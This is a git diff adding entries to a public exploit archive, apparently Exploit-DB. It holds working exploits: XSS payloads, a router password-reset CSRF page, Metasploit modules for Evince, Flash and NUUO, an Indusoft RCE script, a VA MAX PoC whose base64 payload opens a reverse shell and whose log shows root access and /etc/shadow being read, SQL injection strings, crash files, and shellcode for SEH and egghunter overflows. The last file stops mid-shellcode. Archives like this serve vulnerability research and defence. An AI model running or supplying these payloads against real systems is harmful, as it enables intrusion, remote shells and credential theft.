+PAYLOAD +'> + +################################################################################# + +XSS163 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/logs.cgi/firewalllogcountry.dat + +METHOD +Post + +PARAMETER +pienumber + +PAYLOAD +'> + +################################################################################# + +XSS164 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/logs.cgi/log.dat + +METHOD +Post + +PARAMETER +SECTION + +PAYLOAD +'> + +################################################################################# \ No newline at end of file diff --git a/exploits/hardware/webapps/46336.html b/exploits/hardware/webapps/46336.html new file mode 100644 index 000000000..7fed192a5 --- /dev/null +++ b/exploits/hardware/webapps/46336.html @@ -0,0 +1,35 @@ +# Exploit Title: Coship Wireless Router – Wireless SSID Unauthenticated Password Reset +# Date: 07.02.2019 +# Exploit Author: Adithyan AK +# Vendor Homepage: http://en.coship.com/ +# Category: Hardware (WiFi Router) +# Affected Versions *: *Coship RT3052 - 4.0.0.48, Coship RT3050 - 4.0.0.40, Coship WM3300 - 5.0.0.54, Coship WM3300 - 5.0.0.55, Coship RT7620 - 10.0.0.49. +# Tested on: MacOS Mojave v.10.14 +# CVE: CVE-2019-7564 + +#POC : + +# Change the X.X.X.X in poc to Router Gateway address and save the below code as Exploit.html +# Open Exploit.html with your Browser +# Click on “Submit request” +# The password of the Wireless SSID will be changed to "password" + + + + +
+ + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/linux/local/46341.rb b/exploits/linux/local/46341.rb new file mode 100755 index 000000000..2220dd501 --- /dev/null +++ b/exploits/linux/local/46341.rb @@ -0,0 +1,108 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'rex/zip' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Evince CBT File Command Injection', + 'Description' => %q{ + This module exploits a command injection vulnerability in Evince + before version 3.24.1 when opening comic book `.cbt` files. + + Some file manager software, such as Nautilus and Atril, may allow + automatic exploitation without user interaction due to thumbnailer + preview functionality. + + Note that limited space is available for the payload (<256 bytes). + Reverse Bash and Reverse Netcat payloads should be sufficiently small. + + This module has been tested successfully on evince versions: + + 3.4.0-3.1 + nautilus 3.4.2-1+build1 on Kali 1.0.6; + 3.18.2-1ubuntu4.3 + atril 1.12.2-1ubuntu0.3 on Ubuntu 16.04. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Felix Wilhelm', # Discovery + 'Sebastian Krahmer', # PoC + 'Matlink', # Exploit + 'bcoles' # Metasploit + ], + 'References' => + [ + ['BID', '99597'], + ['CVE', '2017-1000083'], + ['EDB', '45824'], + ['URL', 'https://seclists.org/oss-sec/2017/q3/128'], + ['URL', 'https://bugzilla.gnome.org/show_bug.cgi?id=784630'], + ['URL', 'https://bugzilla.suse.com/show_bug.cgi?id=1046856'], + ['URL', 'https://bugs.launchpad.net/ubuntu/+source/atril/+bug/1735418'], + ['URL', 'https://bugs.launchpad.net/ubuntu/+source/atril/+bug/1800662'], + ['URL', 'https://access.redhat.com/security/cve/cve-2017-1000083'], + ['URL', 'https://security-tracker.debian.org/tracker/CVE-2017-1000083'] + ], + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Space' => 215, + 'BadChars' => "\x00\x0a\x0d\x22", + 'DisableNops' => true + }, + 'DefaultOptions' => + { + 'PAYLOAD' => 'cmd/unix/reverse_bash', + 'DisablePayloadHandler' => true + }, + 'Targets' => [[ 'Automatic', {}]], + 'Privileged' => false, + 'DisclosureDate' => '2017-07-13', + 'DefaultTarget' => 0)) + register_options([ + OptString.new('FILENAME', [true, 'The cbt document file name', 'msf.cbt']) + ]) + end + + def exploit + ext = %w[png jpg gif] + path = " --checkpoint-action=exec=bash -c \"#{payload.encoded};\".#{ext.sample}" + + # Tar archive max path length is 256. + if path.length > 256 + fail_with Failure::PayloadFailed, "Payload is too large (#{path.length}): Max path length is 256 characters" + end + + # Tar archive max file name length is 100. + path.split('/').each do |fname| + if fname.length > 100 + fail_with Failure::PayloadFailed, "File name too long (#{fname.length}): Max filename length is 100 characters" + end + end + + # Create malicious tar archive + tarfile = StringIO.new + Rex::Tar::Writer.new tarfile do |tar| + tar.add_file path, 0644 do |io| + io.write '' + end + # Pad file to 1+ MB to trigger tar checkpoint action + tar.add_file rand_text_alphanumeric(10..20), 0644 do |io| + io.write rand_text(1_000_000..1_100_000) + end + end + tarfile.rewind + cbt = tarfile.read + + print_status "Writing file: #{datastore['FILENAME']} (#{cbt.length} bytes) ..." + file_create cbt + end +end \ No newline at end of file diff --git a/exploits/linux/webapps/46349.txt b/exploits/linux/webapps/46349.txt new file mode 100644 index 000000000..3611804b5 --- /dev/null +++ b/exploits/linux/webapps/46349.txt @@ -0,0 +1,20 @@ +# Exploit Title: CentOS Web Panel 0.9.8.763 - Stored Cross-Site Scripting Vulnerability +# Google Dork: N/A +# Date: 10 - January - 2019 +# Exploit Author: DKM +# Vendor Homepage: http://centos-webpanel.com +# Software Link: http://centos-webpanel.com +# Version: v0.9.8.763 +# Tested on: CentOS 7 +# CVE : CVE-2019-7646 + +# Description: +A Stored Cross Site Scripting vulnerability is found in the "Package Name" Field within the 'Add a Package (add_package)' module. This is because the application does not properly sanitize the users input. + + +# Steps to Reproduce: +1. Login into the CentOS Web Panel using admin credential. +2. From Navigation Click on "Packages" -> then Click on "Add a Package" +3. In "Package Name" field give payload as: and provide other details and click on "Create" +4. Now again from Navigation Click on "Packages" -> then Click on "List Packages" +5. Now one can see that the XSS Payload executed. \ No newline at end of file diff --git a/exploits/multiple/remote/46048.py b/exploits/multiple/dos/46048.py similarity index 100% rename from exploits/multiple/remote/46048.py rename to exploits/multiple/dos/46048.py diff --git a/exploits/multiple/remote/46342.py b/exploits/multiple/remote/46342.py new file mode 100755 index 000000000..430209c3c --- /dev/null +++ b/exploits/multiple/remote/46342.py @@ -0,0 +1,136 @@ +## +# Exploit Title: Indusoft Web Studio Unauthenticated RCE +# Date: 02/04/2019 +# Exploit Author: Jacob Baines +# Vendor Homepage: http://www.indusoft.com/ +# Software http://www.indusoft.com/Products-Downloads/Download-Library +# Version: 8.1 SP2 and below +# Tested on: Windows 7 running the Web Studio 8.1 SP2 demo app +# CVE : CVE-2019-6545 CVE-2019-6543 +# Advisory: +https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/SecurityBulletin_LFSec133.pdf?hsLang=en +# Advisory: https://ics-cert.us-cert.gov/advisories/ICSA-19-036-01 +# Advisory: https://www.tenable.com/security/research/tra-2019-04 +## +import argparse +import threading +import socket +from struct import * +import time +import sys + +from impacket import smbserver + +## +# The SMB Server function. Runs on its own thread. +# @param lip the listening IP address +## +def smb_server(lip): + server = smbserver.SimpleSMBServer(listenAddress=lip, listenPort=445) + server.addShare('LOLWAT', '.', '') + server.setSMBChallenge('') + server.setLogFile('/dev/null') + server.start() + +## +# Converts a normal string to a utf 16 with a length field. +# @param s the string to convert +## +def wstr(s): + slen = len(s) + s = s.encode('utf_16_le') + + out = '\xff\xfe\xff' + if slen < 0xff: + out += pack('\n" + "\n" + "\t{WinExec(\"calc.exe\")}\n" + "\t\n" + "\t2\n" + "\t5\n" + "\t127.0.0.1\n" + "\t3997" + "\t0\n" + "\t120\n" + "\n") + xdc.close() + + print "[+] Sending the connection init message" + init_conn = "\x02\x31\x10\x31\x10\x38\x10\x31\x10\x31\x03" + sock.sendall(init_conn) + resp = sock.recv(1024) + print '<- ' + resp + + # do a basic validation of the response + if (len(resp) > 0 and resp[len(resp) - 1] == '\x03'): + print "[+] Received an init response" + else: + print "[-] Invalid init response. Exiting..." + sock.close() + sys.exit(0) + + # Craft command 66 + cmd = wstr('CO') # options: EX, CO, CF, CC + cmd += wstr('\\\\' + args.lip + '\\LOLWAT\\DB') # file to load + cmd += wstr('') + cmd += wstr('') + cmd += wstr('') + cmd += wstr('lolwat') + cmd += pack(' 'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion', + 'Description' => %q( + This module exploits a type confusion on Adobe Flash Player, which was + originally found being successfully exploited in the wild. This module + has been tested successfully on: + macOS Sierra 10.12.3, + Safari and Adobe Flash Player 21.0.0.182, + Firefox and Adobe Flash Player 21.0.0.182. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Genwei Jiang', # FireEye original blog details on the vulnerability + 'bcook-r7' # Imported Metasploit module + ], + 'References' => + [ + ['CVE', '2016-4117'], + ['BID', '90505'], + ['URL', 'https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html'], + ['URL', 'http://www.securitytracker.com/id/1035826'], + ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa16-02.html'], + ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb16-15.html'], + ], + 'Payload' => + { + 'DisableNops' => true + }, + 'Platform' => ['osx'], + 'BrowserRequirements' => + { + source: /script|headers/i, + os_name: lambda do |os| + os =~ OperatingSystems::Match::MAC_OSX + end, + ua_name: lambda do |ua| + case target.name + when 'Mac OS X' + return true if ua == Msf::HttpClients::SAFARI + return true if ua == Msf::HttpClients::FF + end + + false + end, + flash: lambda do |ver| + case target.name + when 'Mac OS X' + return true if Gem::Version.new(ver) <= Gem::Version.new('21.0.0.182') + end + + false + end + }, + 'Targets' => + [ + [ + 'Mac OS X', { + 'Platform' => 'osx', + 'Arch' => ARCH_X64 + } + ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Apr 27 2016', + 'DefaultTarget' => 0)) + end + + def exploit + @swf = create_swf + + super + end + + def on_request_exploit(cli, request, target_info) + print_status("Request: #{request.uri}") + + if request.uri.end_with? 'swf' + print_status('Sending SWF...') + send_response(cli, @swf, 'Content-Type' => 'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache') + return + end + + print_status('Sending HTML...') + send_exploit_html(cli, exploit_template(cli, target_info), 'Pragma' => 'no-cache') + end + + def exploit_template(cli, target_info) + swf_random = "#{rand_text_alpha(3..7)}.swf" + target_payload = get_payload(cli, target_info) + b64_payload = Rex::Text.encode_base64(target_payload) + + if target.name.include? 'osx' + platform_id = 'osx' + end + html_template = %( + + + + + + + + + + + ) + + return html_template, binding + end + + def create_swf + path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-4117', 'msf.swf') + File.binread(path) + end +end \ No newline at end of file diff --git a/exploits/php/remote/46340.rb b/exploits/php/remote/46340.rb new file mode 100755 index 000000000..8b4207a4f --- /dev/null +++ b/exploits/php/remote/46340.rb @@ -0,0 +1,87 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => 'NUUO NVRmini upgrade_handle.php Remote Command Execution', + 'Description' => %q{ + This exploits a vulnerability in the web application of NUUO NVRmini IP camera, + which can be done by triggering the writeuploaddir command in the upgrade_handle.php file. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Berk Dusunur', # @berkdusunur + 'numan turle' # @numanturle + ], + 'References' => + [ + ['URL', 'https://www.berkdusunur.net/2018/11/development-of-metasploit-module-after.html'], + ['URL', 'https://www.tenable.com/security/research/tra-2018-41'], + ['CVE', '2018-14933'], + ['EDB', '45070'] + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true + }, + 'Platform' => %w{ unix win linux }, + 'Arch' => ARCH_CMD, + 'Targets' => [ ['NUUO NVRmini', { }], ], + 'DisclosureDate' => 'Aug 04 2018', + 'DefaultTarget' => 0)) + end + + def check + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'upgrade_handle.php'), + 'vars_get' => + { + 'cmd' => 'writeuploaddir', + 'uploaddir' => "';echo '#{Rex::Text.rand_text_alphanumeric(10..15)}';'" + }} + ) + + unless res + vprint_error 'Connection failed' + return CheckCode::Unknown + end + + if res.code == 200 && res.body =~ /upload_tmp_dir/ + return CheckCode::Vulnerable + end + + CheckCode::Safe + end + + def http_send_command(cmd) + uri = normalize_uri(target_uri.path.to_s, "upgrade_handle.php") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => uri, + 'vars_get' => + { + 'cmd' => 'writeuploaddir', + 'uploaddir' => "';"+cmd+";'" + }} + ) + + unless res + fail_with(Failure::Unknown, 'Failed to execute the command.') + end + + res + end + + def exploit + http_send_command(payload.encoded) + end +end \ No newline at end of file diff --git a/exploits/php/webapps/46347.txt b/exploits/php/webapps/46347.txt new file mode 100644 index 000000000..db7eeeb17 --- /dev/null +++ b/exploits/php/webapps/46347.txt @@ -0,0 +1,23 @@ +# Exploit Title: MyBB Bans List - Cross Site Scripting +# Date: 7/25/2018 +# Author: 0xB9 +# Twitter: @0xB9Sec +# Contact: 0xB9[at]pm.me +# Software Link: https://community.mybb.com/mods.php?action=view&pid=423 +# Version: 1.0 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2018-14724 + + +1. Description: +Adds bans.php page, showing a list of banned users and the reason of ban. + +Any forum user that's a mod can ban users and input a payload into the ban reason which gets executed on the bans.php page. + + +2. Proof of Concept: + +- Have a mod account +- Ban a user +- Input the following for reason of the ban +- Anyone to view page will execute payload \ No newline at end of file diff --git a/exploits/php/webapps/46348.py b/exploits/php/webapps/46348.py new file mode 100755 index 000000000..e1877ea4c --- /dev/null +++ b/exploits/php/webapps/46348.py @@ -0,0 +1,99 @@ +root@nippur:/home/c/src/nippur# cat vamax3.py +#!/usr/bin/env python +# quick poc for postauth rce bug in va max 8.3.4 +# +# more: +# https://code610.blogspot.com +# +# 10.02.2019 +# + +# p.s. +# +# listening on [any] 4444 ... +# 192.168.1.126: inverse host lookup failed: Unknown host +# connect to [192.168.1.160] from (UNKNOWN) [192.168.1.126] 58894 +# sh: no job control in this shell +# sh-4.1$ id +# id +# uid=48(apache) gid=48(apache) groups=48(apache),10(wheel),18(dialout) +# sh-4.1$ cat /etc/shadow +# cat /etc/shadow +# cat: /etc/shadow: Permission denied +# sh-4.1$ +# (...) +# sh-4.1$ sudo -l +# sudo -l +# Matching Defaults entries for apache on this host: +# syslog_goodpri=debug, env_reset, +# secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin +# +# User apache may run the following commands on this host: +# (ALL) NOPASSWD: ALL +# sh-4.1$ sudo su +# sudo su +# id +# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) +# head -n1 /etc/shadow +# root:$6$dNu030j/gSf.5(...)4IlAEGpzHv0:15392:0:99999:7::: +# +# +# o/ + +import datetime, time +import requests +from requests.auth import HTTPBasicAuth + +# defines +dateTime = datetime.datetime.now() +timestamp = int(time.mktime(dateTime.timetuple())) + +remote_host = 'http://192.168.1.126:9080' +our_user = 'loadbalancer' +our_passwd = 'loadbalancer' + +# go +sess = requests.session() +logme = sess.post(remote_host, auth=HTTPBasicAuth(our_user, our_passwd)) +logmeresp = logme.text + + +print '\n\tsmall poc for VA MAX 8.3.4\n' + + + +# try to log in +if 'Load Balancer Administration System' in logmeresp: + print '[+] using credentials: %s : %s' % ( our_user, our_passwd ) + print '[+] our timestamp: %s' % ( timestamp ) + + print '[+] proceed.' + + getme = remote_host + '/lbadmin/config/changeip.php?action=modip&l=e&t=' + str(timestamp) + dogetme = sess.get(getme, auth=HTTPBasicAuth(our_user, our_passwd)) + getmeresp = dogetme.text + + + payload = "h4x;echo cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9J TkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC4xLjE2MCIsNDQ0NCkpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3 MuZHVwMihzLmZpbGVubygpLDEpOyBvcy5kdXAyKHMuZmlsZW5vKCksMik7cD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk7Jwo= | base64 -d | sh;#" + + #payload = "h4x;telnet 192.168.1.160 4444;#" + #payload = ';id>/tmp/id.id.id' + # print '[i] using payload:', payload + + data_req = { + 'eth0' : '192.168.1.126/24', + 'mtu_eth0' : '1500' + payload, # >.< + 'eth1' : '', + 'mtu_eth1' : '1500', + 'eth2' : '', + 'mtu_eth2' : '1500', + 'eth3' : '', + 'mtu_eth3' : '1500', + 'go' : 'Configure+Interfaces' + } + shLink = remote_host + '/lbadmin/config/changeip.php?action=modip&l=e&t=' + str(timestamp) + shellWe = sess.post(shLink, data=data_req, auth=HTTPBasicAuth(our_user, our_passwd)) + shResp = shellWe.text + + # check sudo -l now :> + print '\n\nThanks.Bye.\n' \ No newline at end of file diff --git a/exploits/php/webapps/46350.txt b/exploits/php/webapps/46350.txt new file mode 100644 index 000000000..18669af65 --- /dev/null +++ b/exploits/php/webapps/46350.txt @@ -0,0 +1,46 @@ +=========================================================================================== +# Exploit Title: Webiness Inventory 2.3 - 'email' SQL Vulnerability +# Dork: N/A +# Date: 10-02-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: https://sourceforge.net/projects/webinessinventory/files/ +# Software Link: hhttps://sourceforge.net/projects/webinessinventory/files/ +# Version: 2.3 +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: Small stock inventory managment application for web. +=========================================================================================== +# POC - SQL +# Parameters : email +# Attack Pattern : +-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27 + +# POST Request: +http://localhost/webiness/index.php?request=Wsauth/login/[SQL] +# https://i.hizliresim.com/ADObQ7.jpg +========================================================================= +POST /webiness/index.php?request=Wsauth/login/ HTTP/1.1 +Host: localhost +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: en-us,en;q=0.5 +Cache-Control: no-cache +Content-Length: 458 +Content-Type: multipart/form-data; boundary=54a535315dda429db2f07895827ff1c6 +Cookie: PHPSESSID=6e5836p7djilmbh3bunro0ohu0 +Referer: http://localhost/webiness/ +User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, +like Gecko) Chrome/54.0.2840.99 Safari/537.36 + +--54a535315dda429db2f07895827ff1c6 +Content-Disposition: form-data; name="email" + +-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT +COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x +FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' +--54a535315dda429db2f07895827ff1c6 +Content-Disposition: form-data; name="password" + +--54a535315dda429db2f07895827ff1c6-- \ No newline at end of file diff --git a/exploits/windows/dos/46338.py b/exploits/windows/dos/46338.py new file mode 100755 index 000000000..5eaa9744d --- /dev/null +++ b/exploits/windows/dos/46338.py @@ -0,0 +1,32 @@ +# Exploit Title: FutureDj Pro Local Dos Exploit +# Date: 07.02.2019 +# Vendor Homepage: https://www.xylio.com +# Software Link: https://www.xylio.com/future-dj-pro-a-new-level-of-mixing-perfection/ +# Exploit Author: Achilles +# Tested Version: 1.7.2.0 32bit +# Tested on: Windows 7 SP1 Ultimate + +# 1.- Run python code : FutureDj Pro.py +# 2.- Open EVIL.txt and copy content to clipboard +# 3.- Open future.dj.exe +# 4.- In the New Window click start Free Trial and then 'Click here to Buy' +# 5.- And then 'i already bought it' +# 6.- Paste the Content of EVIL.txt into the 'Unlock key' Name field. +# 7.- Click 'OK' +# 8.- Click 'OK' +# 9.- Click 'Exit' +# 10.- And you will see a crash + + +#!/usr/bin/env python + +buffer = "\x41" * 5000 + +try: + f=open("Evil.txt","w") + print "[+] Creating %s bytes evil payload.." %len(buffer) + f.write(buffer) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/dos/46343.py b/exploits/windows/dos/46343.py new file mode 100755 index 000000000..6f98fb19e --- /dev/null +++ b/exploits/windows/dos/46343.py @@ -0,0 +1,22 @@ +# -*- coding: utf-8 -*- +# Exploit Title: NordVPN 6.19.6 - Denial of Service (PoC) +# Date: 07/02/2019 +# Author: Alejandra Sánchez +# Vendor Homepage: https://nordvpn.com/ +# Software Link: https://downloads.nordcdn.com/apps/windows/10/NordVPN/latest/NordVPNSetup.exe +# Version: 6.19.6 +# Tested on: Windows 10 + +# Proof of Concept: +# 1.- Run the python script, it will create a new file "PoC.txt" +# 2.- Copy the text from the generated PoC.txt file to clipboard +# 3.- Open NordVPN.exe +# 3.- Paste clipboard in 'E-mail' field +# 4.- Write '1234' in 'Password' field +# 5.- Clic on button -> Sign In +# 6.- Crashed + +buffer = "\x41" * 100000 +f = open ("PoC.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/46346.py b/exploits/windows/dos/46346.py new file mode 100755 index 000000000..f5c18713d --- /dev/null +++ b/exploits/windows/dos/46346.py @@ -0,0 +1,44 @@ +# Exploit Title: River Past Video Cleaner Buffer Overflow (SEH) +# Date: 9-2-2019 +# Exploit Author: crash_manucoot +# Contact: twitter.com/crash_manucoot +# Software Link: https://river-past-video-cleaner.softonic.com/ +# Version: 7.6.3 +# Tested on: Windows 10 Pro x64 SPANISH +# Category: Windows Local Exploit +# How to use:open the program go to file-options paste the contents of open.txt in the Lame_enc.dll field and the calculator will open + + + + +buff = "A" * 280 +nseh = "\xeb\x06\x90\x90" +seh = "\x3a\x91\x01\x10" +nop = "\x90" * 16 + +shellcode = "" +shellcode += "\xbf\xc6\xde\x94\x3e\xda\xd0\xd9\x74\x24\xf4\x5d" +shellcode += "\x31\xc9\xb1\x31\x31\x7d\x13\x03\x7d\x13\x83\xc5" +shellcode += "\xc2\x3c\x61\xc2\x22\x42\x8a\x3b\xb2\x23\x02\xde" +shellcode += "\x83\x63\x70\xaa\xb3\x53\xf2\xfe\x3f\x1f\x56\xeb" +shellcode += "\xb4\x6d\x7f\x1c\x7d\xdb\x59\x13\x7e\x70\x99\x32" +shellcode += "\xfc\x8b\xce\x94\x3d\x44\x03\xd4\x7a\xb9\xee\x84" +shellcode += "\xd3\xb5\x5d\x39\x50\x83\x5d\xb2\x2a\x05\xe6\x27" +shellcode += "\xfa\x24\xc7\xf9\x71\x7f\xc7\xf8\x56\x0b\x4e\xe3" +shellcode += "\xbb\x36\x18\x98\x0f\xcc\x9b\x48\x5e\x2d\x37\xb5" +shellcode += "\x6f\xdc\x49\xf1\x57\x3f\x3c\x0b\xa4\xc2\x47\xc8" +shellcode += "\xd7\x18\xcd\xcb\x7f\xea\x75\x30\x7e\x3f\xe3\xb3" +shellcode += "\x8c\xf4\x67\x9b\x90\x0b\xab\x97\xac\x80\x4a\x78" +shellcode += "\x25\xd2\x68\x5c\x6e\x80\x11\xc5\xca\x67\x2d\x15" +shellcode += "\xb5\xd8\x8b\x5d\x5b\x0c\xa6\x3f\x31\xd3\x34\x3a" +shellcode += "\x77\xd3\x46\x45\x27\xbc\x77\xce\xa8\xbb\x87\x05" +shellcode += "\x8d\x34\xc2\x04\xa7\xdc\x8b\xdc\xfa\x80\x2b\x0b" +shellcode += "\x38\xbd\xaf\xbe\xc0\x3a\xaf\xca\xc5\x07\x77\x26" +shellcode += "\xb7\x18\x12\x48\x64\x18\x37\x2b\xeb\x8a\xdb\x82" +shellcode += "\x8e\x2a\x79\xdb" + +evil = buff + nseh + seh + nop + shellcode + +file = open('open.txt','w+') +file.write(evil) +file.close() \ No newline at end of file diff --git a/exploits/windows/local/46334.py b/exploits/windows/local/46334.py new file mode 100755 index 000000000..1d5fdc610 --- /dev/null +++ b/exploits/windows/local/46334.py @@ -0,0 +1,119 @@ +#!/usr/bin/env python + +#------------------------------------------------------------------------------------------------------------------------------------# +# Exploit: IP-Tools 2.5 - Local Buffer Overflow(EggHunter) # +# Date: 2019-02-06 # +# Author: Juan Prescotto # +# Tested Against: Win7 Pro SP1 64 bit # +# Software Download #1: https://web.archive.org/web/20070322163021/http://hostmonitor.biz:80/download/ip-tools.exe # +# Software Download #2: https://www.exploit-db.com/apps/4a83348f18a18ba34f9747648b550307-ip-tools.exe # +# Version: 2.5 # +# Special Thanks to my wife for allowing me spend countless hours on this passion of mine # +# Steps : Open the APP > SNMP Scanner > paste in contents from the egg.txt into "From Addr" > "Start" > Click "Options" > # +# "Host Monitor" --> "Logging" > paste in contents from the egghunter.txt into "Log to file" > OK > Bind Shell - Port 4444 # +#------------------------------------------------------------------------------------------------------------------------------------# +# Good Characers: alphanumeric and printable special characters # +# EIP Offset Overwrite ("Log to file" field): 264 # +# Non-Participating Modules: ip_tools.exe # +#------------------------------------------------------------------------------------------------------------------------------------# +# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite --> # +# Stack Adjust (0x40) / RETN --> Egghunter Shellcode --> Egg Shellcode # +#------------------------------------------------------------------------------------------------------------------------------------# + + +##################EGG Shellcode Generation################################# + +#msfvenom -p windows/shell_bind_tcp LPORT=4444 BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg +#710 bytes + 8 bytes for egg identifier + +egg = "w00tw00t" +egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" +egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" +egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +egg += "\x69\x6c\x4b\x58\x6d\x52\x35\x50\x35\x50\x75\x50\x63" +egg += "\x50\x4f\x79\x4d\x35\x36\x51\x4b\x70\x71\x74\x6e\x6b" +egg += "\x36\x30\x46\x50\x6e\x6b\x66\x32\x44\x4c\x6c\x4b\x63" +egg += "\x62\x54\x54\x4c\x4b\x72\x52\x65\x78\x34\x4f\x68\x37" +egg += "\x52\x6a\x34\x66\x50\x31\x59\x6f\x4c\x6c\x57\x4c\x53" +egg += "\x51\x71\x6c\x67\x72\x54\x6c\x31\x30\x5a\x61\x58\x4f" +egg += "\x34\x4d\x56\x61\x4f\x37\x68\x62\x4a\x52\x36\x32\x66" +egg += "\x37\x4e\x6b\x36\x32\x42\x30\x6c\x4b\x50\x4a\x35\x6c" +egg += "\x4c\x4b\x72\x6c\x44\x51\x44\x38\x78\x63\x32\x68\x55" +egg += "\x51\x78\x51\x43\x61\x6e\x6b\x76\x39\x45\x70\x75\x51" +egg += "\x59\x43\x6e\x6b\x33\x79\x42\x38\x4d\x33\x65\x6a\x71" +egg += "\x59\x6e\x6b\x36\x54\x4e\x6b\x36\x61\x78\x56\x46\x51" +egg += "\x49\x6f\x4e\x4c\x79\x51\x7a\x6f\x66\x6d\x35\x51\x48" +egg += "\x47\x36\x58\x79\x70\x30\x75\x39\x66\x33\x33\x33\x4d" +egg += "\x58\x78\x57\x4b\x73\x4d\x56\x44\x53\x45\x48\x64\x61" +egg += "\x48\x4e\x6b\x72\x78\x67\x54\x57\x71\x69\x43\x73\x56" +egg += "\x6e\x6b\x54\x4c\x50\x4b\x6c\x4b\x53\x68\x37\x6c\x73" +egg += "\x31\x58\x53\x4c\x4b\x74\x44\x4e\x6b\x67\x71\x48\x50" +egg += "\x4f\x79\x70\x44\x36\x44\x76\x44\x51\x4b\x71\x4b\x55" +egg += "\x31\x46\x39\x32\x7a\x63\x61\x4b\x4f\x6b\x50\x53\x6f" +egg += "\x61\x4f\x61\x4a\x4c\x4b\x62\x32\x6a\x4b\x6e\x6d\x31" +egg += "\x4d\x63\x58\x75\x63\x54\x72\x35\x50\x45\x50\x33\x58" +egg += "\x52\x57\x33\x43\x36\x52\x73\x6f\x62\x74\x33\x58\x30" +egg += "\x4c\x31\x67\x54\x66\x63\x37\x69\x6f\x6e\x35\x78\x38" +egg += "\x4e\x70\x63\x31\x37\x70\x43\x30\x35\x79\x4f\x34\x32" +egg += "\x74\x46\x30\x51\x78\x36\x49\x4f\x70\x52\x4b\x63\x30" +egg += "\x59\x6f\x38\x55\x73\x5a\x43\x38\x70\x59\x36\x30\x49" +egg += "\x72\x59\x6d\x57\x30\x52\x70\x47\x30\x50\x50\x51\x78" +egg += "\x5a\x4a\x44\x4f\x6b\x6f\x79\x70\x39\x6f\x39\x45\x4f" +egg += "\x67\x65\x38\x44\x42\x77\x70\x64\x51\x71\x4c\x6c\x49" +egg += "\x6d\x36\x32\x4a\x72\x30\x63\x66\x56\x37\x30\x68\x68" +egg += "\x42\x4b\x6b\x64\x77\x61\x77\x59\x6f\x39\x45\x70\x57" +egg += "\x35\x38\x6d\x67\x68\x69\x65\x68\x59\x6f\x6b\x4f\x4a" +egg += "\x75\x36\x37\x75\x38\x34\x34\x58\x6c\x57\x4b\x4d\x31" +egg += "\x49\x6f\x4a\x75\x51\x47\x4e\x77\x55\x38\x32\x55\x52" +egg += "\x4e\x70\x4d\x43\x51\x39\x6f\x6e\x35\x51\x78\x70\x63" +egg += 